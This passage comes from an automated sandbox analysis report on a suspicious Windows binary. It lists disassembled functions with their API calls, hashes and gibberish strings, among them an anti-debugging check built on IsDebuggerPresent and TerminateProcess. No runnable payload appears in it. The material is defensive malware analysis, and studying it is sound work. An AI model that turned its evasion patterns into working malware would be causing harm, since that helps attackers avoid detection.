                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CreateFileFormatName$ModuleTime$AliasConsoleEnvironmentExesNamedNumberObjectPipeProcessShortValueVariable
                                              • String ID:
                                              • API String ID: 4163992861-0
                                              • Opcode ID: c696d350f9cbd58aeb209f839cb97cd2d3af78f45c1cfbe8e87d3c802f68113d
                                              • Instruction ID: ee29fcefd4d71f99ff44f49a2115cb02694ff77d511bbf1d43b7a3e3e6c29421
                                              • Opcode Fuzzy Hash: c696d350f9cbd58aeb209f839cb97cd2d3af78f45c1cfbe8e87d3c802f68113d
                                              • Instruction Fuzzy Hash: CA21CC75A40344BBF3509FA0DE09F997B78EB48707F004065F708B61E0CAB05584CB69
                                              Function 00403A10 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,2C788E9F,18A3A711,224BFD48,7FC70782,09E143CA,17C3CCF2,541A7EB8,315CA5DA,224BFD48,6E8781CC,32F3EFCE,224BFD48), ref: 00403DD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory
                                              • String ID: 5Myi$Kn$b6$ZV7$y9=
                                              • API String ID: 1611563598-2733252791
                                              • Opcode ID: 32edf5b412df797890cec91c07ae5d8e206d8e81fd75e990c405da7a973fa397
                                              • Instruction ID: dd277fa5bcd038b3fb73d8ded35ed20b6e10e6fa25372812213cf8750d62d16f
                                              • Opcode Fuzzy Hash: 32edf5b412df797890cec91c07ae5d8e206d8e81fd75e990c405da7a973fa397
                                              • Instruction Fuzzy Hash: 7CA1FDB5E00328DFDB24CFAAD98A68DFBB4BF04314F608588E5597B612D7309A81CF45
                                              Function 0040540B Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0040A957
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A96C
                                              • UnhandledExceptionFilter.KERNEL32(00401A6C), ref: 0040A977
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0040A993
                                              • TerminateProcess.KERNEL32(00000000), ref: 0040A99A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 197ba938e63218f443c465da3c253e91d636742bd0329b3540dddb7268697b59
                                              • Instruction ID: 335a9f500208b5a248cea33aff54e7930ce155153cccc0a294cbadf7bec46998
                                              • Opcode Fuzzy Hash: 197ba938e63218f443c465da3c253e91d636742bd0329b3540dddb7268697b59
                                              • Instruction Fuzzy Hash: D421CEB8801304EFD700DF29EA457947BA4FB1C306F10543AE80997672E7B49985CF4D
                                              Function 00408D38 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00008CF6), ref: 00408D3D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 1792ff99a071a00e974996f980eeec1d20762474deb5b091927190f676798104
                                              • Instruction ID: 3d4c199bebb8fa4018e88d1f5d50d4939034e62edc886e79ef66bd0164c3be97
                                              • Opcode Fuzzy Hash: 1792ff99a071a00e974996f980eeec1d20762474deb5b091927190f676798104
                                              • Instruction Fuzzy Hash: 679002A426718186F60017709F5990675E05A5871275144766486F54A6DE744480A93D
                                              Function 00404E73 Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                              • String ID:
                                              • API String ID: 2477803136-0
                                              • Opcode ID: 6ac91b0af1784ede184c693781262ef71dab2860fac2af71bcecb1abb2aa3d1c
                                              • Instruction ID: 57a37b661012d7a2b464263d5a00e7c16c4daa68fc553bd61ae124c2d0180b35
                                              • Opcode Fuzzy Hash: 6ac91b0af1784ede184c693781262ef71dab2860fac2af71bcecb1abb2aa3d1c
                                              • Instruction Fuzzy Hash: 4B21A6F094430599EB24BBB2A84676F2664EF80709F10483FF605BA1C3DB7C98814A9D
                                              Function 00403938 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNEL32(nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan), ref: 00403951
                                              • GetShortPathNameA.KERNEL32(rupajineligigepubofe,?,00000000), ref: 00403961
                                              • GlobalFree.KERNEL32(00000000), ref: 00403965
                                              • GetEnvironmentStrings.KERNEL32 ref: 00403967
                                              • SetComputerNameW.KERNEL32(00000000), ref: 0040396F
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00403984
                                              • LoadLibraryA.KERNEL32(00451B18), ref: 004039E7
                                              Strings
                                              • nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan, xrefs: 0040394C
                                              • rupajineligigepubofe, xrefs: 0040395C
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Name$AttributesComputerEnvironmentExchangeFileFreeGlobalInterlockedLibraryLoadPathShortStrings
                                              • String ID: nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan$rupajineligigepubofe
                                              • API String ID: 163159629-979419650
                                              • Opcode ID: dd508f7294a3f66d136bc4aa6c708a105f860bf75837bdb66cd7b18e132766e0
                                              • Instruction ID: a8d1aabc516c639bdf93d1c2f4a976be030ecb7542e0ca02f03a5f53308a6a77
                                              • Opcode Fuzzy Hash: dd508f7294a3f66d136bc4aa6c708a105f860bf75837bdb66cd7b18e132766e0
                                              • Instruction Fuzzy Hash: 8D11C4716883C0CED3018B64FD0DB593F64A766707F01017AD184162F3E7B96248CBAE
                                              Function 00404140 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 113COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw_memcpy_sstd::exception::exception
                                              • String ID: h7@$h7@$h7@
                                              • API String ID: 464988439-3733659376
                                              • Opcode ID: 3d068626e3a460379442fe46fac1553ec098a5b34774a288ba3508e502bcb2c8
                                              • Instruction ID: 9748b27a298a6b7da6d7a9b502d7af3a72d3ff42f644983566e744f5fbea8794
                                              • Opcode Fuzzy Hash: 3d068626e3a460379442fe46fac1553ec098a5b34774a288ba3508e502bcb2c8
                                              • Instruction Fuzzy Hash: 4041D4F1A10605ABD704DFA9C981AAEB7B4FB85310F10427FE526A77C1D378A940CBD9
                                              Function 00409E5A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • __CreateFrameInfo.LIBCMT ref: 00409E82
                                                • Part of subcall function 00405306: __getptd.LIBCMT ref: 00405314
                                                • Part of subcall function 00405306: __getptd.LIBCMT ref: 00405322
                                              • __getptd.LIBCMT ref: 00409E8C
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 00409E9A
                                              • __getptd.LIBCMT ref: 00409EA8
                                              • __getptd.LIBCMT ref: 00409EB3
                                              • _CallCatchBlock2.LIBCMT ref: 00409ED9
                                                • Part of subcall function 004053AB: __CallSettingFrame@12.LIBCMT ref: 004053F7
                                                • Part of subcall function 00409F80: __getptd.LIBCMT ref: 00409F8F
                                                • Part of subcall function 00409F80: __getptd.LIBCMT ref: 00409F9D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                              • String ID:
                                              • API String ID: 1602911419-0
                                              • Opcode ID: 2fc41ddc5830f9502d3c7c8e48507b50f26f0f4595e4a0719680c982764d6087
                                              • Instruction ID: 175549b2cd202aed7b7900b760b95131a278d0db31b7968ddb5efe0dc9efe250
                                              • Opcode Fuzzy Hash: 2fc41ddc5830f9502d3c7c8e48507b50f26f0f4595e4a0719680c982764d6087
                                              • Instruction Fuzzy Hash: B211D775D04209DFDB10EFA5C446AEEBBB0FF44319F10806AF814A7292DB789A159F98
                                              Function 00409BA9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 00409BC3
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 00409BD4
                                              • __getptd.LIBCMT ref: 00409BE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                              • String ID: MOC$csm
                                              • API String ID: 803148776-1389381023
                                              • Opcode ID: e3ae86297f6c83d9fb0caa9784db7bae5df6550cb3337f8259c956ffe1779f93
                                              • Instruction ID: 3acf4969e278ddadc01e58b4968947c2eeabd5294adb439926e562968c1d0a7a
                                              • Opcode Fuzzy Hash: e3ae86297f6c83d9fb0caa9784db7bae5df6550cb3337f8259c956ffe1779f93
                                              • Instruction Fuzzy Hash: B5E01A361282048FD710AB69D446B6A32A8FF84328F1500B6A808DB3A3D73CEC54964A
                                              Function 0040B833 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 0040B83F
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __amsg_exit.LIBCMT ref: 0040B85F
                                              • __lock.LIBCMT ref: 0040B86F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040B88C
                                              • InterlockedIncrement.KERNEL32(0044B7D8), ref: 0040B8B7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                              • String ID:
                                              • API String ID: 4271482742-0
                                              • Opcode ID: dc926768687387bdaebe5ebe042f59be677f0f0d5b1d60369f2b0e07b454c787
                                              • Instruction ID: 9a61905bef7403cac14438c4351fa39f7b27295c18abd7c641948c94c66c028d
                                              • Opcode Fuzzy Hash: dc926768687387bdaebe5ebe042f59be677f0f0d5b1d60369f2b0e07b454c787
                                              • Instruction Fuzzy Hash: D0015E36900A15DBE721BB66948579A7764EF05754F05803FE810B76E1CB3CA881CBDE
                                              Function 00406641 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __lock.LIBCMT ref: 0040665F
                                                • Part of subcall function 00407F98: __mtinitlocknum.LIBCMT ref: 00407FAE
                                                • Part of subcall function 00407F98: __amsg_exit.LIBCMT ref: 00407FBA
                                                • Part of subcall function 00407F98: EnterCriticalSection.KERNEL32(?,?,?,0040CCC0,00000004,0044A150,0000000C,0040ADAA,?,?,00000000,00000000,00000000,?,00409740,00000001), ref: 00407FC2
                                              • ___sbh_find_block.LIBCMT ref: 0040666A
                                              • ___sbh_free_block.LIBCMT ref: 00406679
                                              • HeapFree.KERNEL32(00000000,00000000,00449DB8,0000000C,004047E6,?,00403271), ref: 004066A9
                                              • GetLastError.KERNEL32 ref: 004066BA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2714421763-0
                                              • Opcode ID: 3dd1c104f3e7b85c235db88422c712877311583af5741d38ab9e16f9065830b0
                                              • Instruction ID: a1099164fd7550ba95ff20370da2958e4c5e716be06619bbe1a15ff32a2ac325
                                              • Opcode Fuzzy Hash: 3dd1c104f3e7b85c235db88422c712877311583af5741d38ab9e16f9065830b0
                                              • Instruction Fuzzy Hash: 41018F71C04711AADF207F729C0AB9E3BA49F01769F12493FF441BA1D2CE7D99608A5D
                                              Function 00403E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00404495: __EH_prolog3.LIBCMT ref: 0040449C
                                                • Part of subcall function 00404495: std::bad_exception::bad_exception.LIBCMT ref: 004044B9
                                                • Part of subcall function 00404495: __CxxThrowException@8.LIBCMT ref: 004044C7
                                              • std::_String_base::_Xlen.LIBCPMT ref: 00403EB1
                                                • Part of subcall function 0040445D: __EH_prolog3.LIBCMT ref: 00404464
                                                • Part of subcall function 0040445D: std::bad_exception::bad_exception.LIBCMT ref: 00404481
                                                • Part of subcall function 0040445D: __CxxThrowException@8.LIBCMT ref: 0040448F
                                              • _memcpy_s.LIBCMT ref: 00403F26
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Exception@8H_prolog3Throwstd::bad_exception::bad_exception$String_base::_Xlen_memcpy_sstd::_
                                              • String ID: h7@$h7@
                                              • API String ID: 2371884630-3958829557
                                              • Opcode ID: c0589e1c9f4925b8e6f740923a83d24e1163df58f1dc207809a61f40d0f5e362
                                              • Instruction ID: 4e7890e22975db89175160b39f3d3c87135534139d79fc71cc2319ffacf18912
                                              • Opcode Fuzzy Hash: c0589e1c9f4925b8e6f740923a83d24e1163df58f1dc207809a61f40d0f5e362
                                              • Instruction Fuzzy Hash: 9431E6323005109BC710DE4DE880A5AFBA9EBE1761B10063FF6559B2C1C735ED41C7E9
                                              Function 0040A207 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___BuildCatchObject.LIBCMT ref: 0040A21A
                                                • Part of subcall function 0040A175: ___BuildCatchObjectHelper.LIBCMT ref: 0040A1AB
                                              • _UnwindNestedFrames.LIBCMT ref: 0040A231
                                              • ___FrameUnwindToState.LIBCMT ref: 0040A23F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                              • String ID: csm
                                              • API String ID: 2163707966-1018135373
                                              • Opcode ID: e35613447c3717e4a37f21c48efb3079f56f9b493ba6bdf2114eae8f4c57fbb7
                                              • Instruction ID: 788f5e188c3528fb811398352f40b0c2e8bf9c4d14057e3e728ff746af4b7f07
                                              • Opcode Fuzzy Hash: e35613447c3717e4a37f21c48efb3079f56f9b493ba6bdf2114eae8f4c57fbb7
                                              • Instruction Fuzzy Hash: B601E831000209BBDF126E51DC45EAF7F6AFF09354F00406AFD18252A1D73A9971EBAA
                                              Function 0040D8A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040B4BA), ref: 0040D8A6
                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040D8B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                              • API String ID: 1646373207-3105848591
                                              • Opcode ID: 11131a3264e11e2599991262595a3c608550aaef01fa8531127675aa8e847add
                                              • Instruction ID: 389c79f7c984ce88bee0376d2814aef5514c98a40adb612dc2e08a991ef5240a
                                              • Opcode Fuzzy Hash: 11131a3264e11e2599991262595a3c608550aaef01fa8531127675aa8e847add
                                              • Instruction Fuzzy Hash: B2F01D31A00A09D2DF002BF1BE4E66F7B74BB84741F9244B1A5A1B01D4DE788079825A
                                              Function 00404495 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 0040449C
                                                • Part of subcall function 00403DF0: _strlen.LIBCMT ref: 00403E0A
                                              • std::bad_exception::bad_exception.LIBCMT ref: 004044B9
                                                • Part of subcall function 0040440E: std::runtime_error::runtime_error.LIBCPMT ref: 00404419
                                              • __CxxThrowException@8.LIBCMT ref: 004044C7
                                                • Part of subcall function 00404FCB: RaiseException.KERNEL32(?,?,00404E1A,?,?,?,?,?,00404E1A,?,0044A290,00450F64,h7@,?,00000000,0004A7A8), ref: 0040500D
                                              Strings
                                              • invalid string position, xrefs: 004044A1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                              • String ID: invalid string position
                                              • API String ID: 843739861-1799206989
                                              • Opcode ID: 700d1af2c4eaf03bea565af7b03dbead500a3d3712d730e22dc07129d8cefecd
                                              • Instruction ID: fae6d0ca2df376a34d2d3c54931f6281d6c7b07355819c79e81589d3f49b10fc
                                              • Opcode Fuzzy Hash: 700d1af2c4eaf03bea565af7b03dbead500a3d3712d730e22dc07129d8cefecd
                                              • Instruction Fuzzy Hash: 31F0BE7260022867DB00EAD2CC07FDE7668EB54725F20053BB300B65C2CAB8AA1087DC
                                              Function 0040FF4C Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040FF80
                                              • __isleadbyte_l.LIBCMT ref: 0040FFB4
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0040FFE5
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 00410053
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
